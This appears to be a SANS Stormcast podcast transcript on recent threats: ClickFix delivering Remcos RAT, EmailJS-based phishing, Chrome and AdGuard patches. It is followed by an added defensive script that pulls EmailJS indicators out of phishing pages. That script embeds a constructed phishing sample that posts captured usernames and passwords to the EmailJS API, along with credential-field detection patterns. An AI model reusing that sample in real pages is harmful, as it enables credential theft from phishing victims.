
SANS Stormcast Monday, March 16th, 2026: SmartApeSG and Remcos RAT; React Based Phishing; Google Chrome Patches; AdGuard Vuln

Direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9850.mp3


SmartApeSG campaign uses ClickFix page to push Remcos RAT
https://isc.sans.edu/diary/SmartApeSG%20campaign%20uses%20ClickFix%20page%20to%20push%20Remcos%20RAT/32796

A React-based phishing page with credential exfiltration via EmailJS
https://isc.sans.edu/diary/32794

Google Chrome announced two zero-day fixes, then removed one.
https://chromereleases.googleblog.com/2026/03/stable-channel-update-for-desktop_12.html

AdGuard Vulnerability
https://github.com/AdguardTeam/AdGuardHome/releases/tag/v0.107.73

Podcast Transcript

Hello and welcome to the Monday, March 16, 2026 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ullrich, recording today from Jacksonville, Florida. And this episode is brought to you by the SANS.edu graduate certificate program in Purple Team Operations.

And today we got a couple of interesting diaries to talk about. The first one is by Brad, about a ClickFix campaign that is then pushing Remcos RAT. Now, this is all associated with SmartApeSG, a threat actor that Brad has talked about before. In the past they have deployed other RATs, like for example NetSupport Manager. Overall the attack is, well, what we have seen so many times, where a victim is presented with a fake captcha that tricks them into copy-pasting a command into their Windows system that will then download the malware. As usual, Brad is also sharing all the evidence, including packet captures and the like. So this is a great diary to kind of follow along Brad's analysis and also learn a little bit more about how to analyze these kinds of compromises.

And the second diary from this weekend comes from Jan, and Jan is looking at an interesting phishing trick being played here. It all starts fairly straightforward. The victim receives a PDF. The PDF itself is harmless, other than it contains a link to a Cloudflare worker. And that Cloudflare worker is used in order to display the phishing page, with a lot of JavaScript. Now, the one trick here: the attacker is collecting, of course, credentials, and in the example that Jan shows they're impersonating Dropbox. But they have to get the credentials somehow to the attacker. In the past we have seen stuff used like Telegram, for example, which is very popular. A bunch of different APIs. What they're using in this particular case is EmailJS. EmailJS allows you to send email with JavaScript. Of course, JavaScript itself doesn't allow you to, like, speak SMTP or such. So instead they're connecting to the EmailJS web service, which allows you to then send HTTP requests to the web service that will then result in the email being sent to the attacker. So, an interesting twist on this. Of course, I think it makes it a little bit easier then to actually find the attacker, given that you can check what EmailJS account or so they're using. And that may be a little bit of a vulnerability here in this particular scheme. But then again, as long as it lasts a day or two, that's probably all attackers need in order to call this particular phishing campaign successful.

Well, then we got a little bit of patch drama with Google Chrome. On Thursday, Google released a new version of Chrome, stating that they patched two critical vulnerabilities in Google Chrome that were already exploited in the wild. On Friday they corrected the notice, stating that this update actually only fixes one of these vulnerabilities, and the second is going to be updated in the next version of Google Chrome. So there is still an outstanding, already exploited vulnerability that will hopefully be patched soon. Just now, make sure that you keep Google Chrome patched. As I always say, at least once a day restart Google Chrome, and once a week double-check that you're running the latest version.

Microsoft published a blog post with details regarding a campaign they are currently observing that tricks users into downloading malicious VPN clients. It all starts with good old search engine optimization. So that's still a thing, sadly. If the user searches for a VPN client, they are then being directed to a fake website that imitates the particular manufacturer. And then the download will actually capture the credentials as the user types them in. There are a number of different VPN clients being impersonated here by this particular malware. Like, Pulse Secure is one, but also Fortinet and a couple of others; Cisco, I think, also. There is not a vulnerability really in any of these VPN systems, but just malicious software that the user is tricked into installing. It's digitally signed using a Chinese certificate. Unclear where that came from, but likely stolen from the rightful owner. And with all of the search engine optimization tricks, and in many cases also paid malicious advertisements, of course one defense is to run some kind of ad blocker.

Well, if you're running AdGuard Home, there's an update for you. It does fix an authentication issue that would allow an attacker to gain full access to AdGuard Home without valid credentials. I'm not sure how severe or exploitable this vulnerability is, given that it does require a transition from HTTP/2 cleartext to, basically, encrypted, or HTTP/2 over TLS. And browsers typically don't support HTTP/2 cleartext. So maybe difficult to exploit, but please keep your systems updated. And this time it's AdGuard's time.

Well, and this is it for today. So thanks again for listening. Thanks for liking. Thanks for subscribing to this podcast. And talk to you again tomorrow. Bye.
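The EmailJS exfiltration path discussed in the transcript (the phishing page's JavaScript cannot speak SMTP, so it hands the captured form fields to the EmailJS web service over HTTP, and EmailJS mails them to the attacker's account) leaves the attacker's account identifiers sitting in the page source, which is the weakness Johannes points at. The following is an added example, not code from the ISC diary, the podcast, or EmailJS: it pulls those identifiers out of a captured page so they can be reported to EmailJS and used as block and hunt indicators. It assumes EmailJS's documented call shapes (`emailjs.init(...)`, `emailjs.send(serviceId, templateId, params[, publicKey])`, and the REST endpoint `https://api.emailjs.com/api/v1.0/email/send` taking `service_id`, `template_id`, `user_id` and `template_params`) and its default `service_` / `template_` id prefixes. The page source in the block is constructed; a minified React bundle will rename the SDK import (here `Ae`), which is why the matching keys off string literals and object keys rather than the `emailjs` identifier.

```javascript
// Added example (not code from the ISC diary, the podcast, or EmailJS): extract
// the EmailJS account identifiers from a captured phishing page so the abuse can
// be reported to EmailJS and the indicators blocked or hunted for.
// Assumptions: EmailJS's documented call shapes and REST body fields, and its
// default "service_" / "template_" id prefixes. The page source below is
// constructed for this example and mimics a minified React bundle.

const CONSTRUCTED_PAGE_SOURCE = `
<script type="module">
import Ae from "https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js";
Ae.init({ publicKey: "Ab12Cd34Ef56Gh78I" });
function L(e){e.preventDefault();
  const u=document.querySelector("#email").value,p=document.querySelector("#password").value;
  Ae.send("service_k1x9q2v","template_7pz3m4d",{user:u,pass:p,ua:navigator.userAgent})
    .then(()=>location.replace("https://www.dropbox.com/login"));}
</script>
<script>
// fallback path: raw REST call to the EmailJS API
fetch("https://api.emailjs.com/api/v1.0/email/send",{method:"POST",
  headers:{"Content-Type":"application/json"},
  body:JSON.stringify({service_id:"service_k1x9q2v",template_id:"template_7pz3m4d",
    user_id:"Ab12Cd34Ef56Gh78I",template_params:{user:"x",pass:"y"}})});
</script>`;

function extractEmailJsIndicators(source) {
  const found = {
    sdkUrls: new Set(), apiEndpoints: new Set(), serviceIds: new Set(),
    templateIds: new Set(), publicKeys: new Set(), exfilFields: new Set(),
  };

  // Any URL that references EmailJS: the SDK (usually loaded from a CDN) or the REST API.
  for (const m of source.matchAll(/https?:\/\/[^"'\s)]*emailjs[^"'\s)]*/gi)) {
    (/^https?:\/\/api\.emailjs\.com\//i.test(m[0]) ? found.apiEndpoints : found.sdkUrls).add(m[0]);
  }
  // Quoted ids only, so the JSON keys service_id / template_id in a REST body are not picked up.
  for (const m of source.matchAll(/["'](service_[A-Za-z0-9]+)["']/g)) found.serviceIds.add(m[1]);
  for (const m of source.matchAll(/["'](template_[A-Za-z0-9]+)["']/g)) found.templateIds.add(m[1]);
  // Public key: init("key"), init({ publicKey: "key" }), or user_id: "key" in a raw REST body.
  for (const m of source.matchAll(/(?:(?:publicKey|user_id)\s*:\s*|\.init\(\s*)["']([A-Za-z0-9_-]{10,40})["']/g)) {
    found.publicKeys.add(m[1]);
  }
  // Keys of the object handed to the template: these are the fields mailed to the attacker.
  const paramObjects = [
    ...source.matchAll(/\.send\(\s*["'][^"']+["']\s*,\s*["'][^"']+["']\s*,\s*\{([^}]*)\}/g),
    ...source.matchAll(/template_params\s*:\s*\{([^}]*)\}/g),
  ];
  for (const m of paramObjects) {
    for (const k of m[1].matchAll(/(?:^|[,\s])["']?([A-Za-z_$][\w$]*)["']?\s*:/g)) found.exfilFields.add(k[1]);
  }

  // Return sorted arrays so the result is stable enough to diff against previous captures.
  const sorted = {};
  for (const [k, v] of Object.entries(found)) sorted[k] = [...v].sort();
  return sorted;
}

function analyzePhishingPage(source) {
  const indicators = extractEmailJsIndicators(source);
  const usesEmailJs = indicators.sdkUrls.length > 0 || indicators.apiEndpoints.length > 0;
  // A service id plus a template id is what EmailJS needs to route the mail; with a
  // referenced SDK or endpoint that is a strong sign the page exfiltrates via EmailJS.
  const likelyEmailJsExfil = usesEmailJs && indicators.serviceIds.length > 0 && indicators.templateIds.length > 0;
  const credentialFieldsSeen = indicators.exfilFields.some((f) => /pass|pwd|otp|token|secret|user|email/i.test(f));
  return { indicators, likelyEmailJsExfil, credentialFieldsSeen };
}

console.log(JSON.stringify(analyzePhishingPage(CONSTRUCTED_PAGE_SOURCE), null, 2));
```

Run it with `node` against a saved copy of the page (swap the constructed source for the captured one). The service id, template id and public key together identify the attacker's EmailJS account, which is what you hand to EmailJS's abuse contact; `api.emailjs.com` is the host to alert on or block at the proxy if the organisation has no business use for it, and the extracted field names tell you which credentials were actually sent.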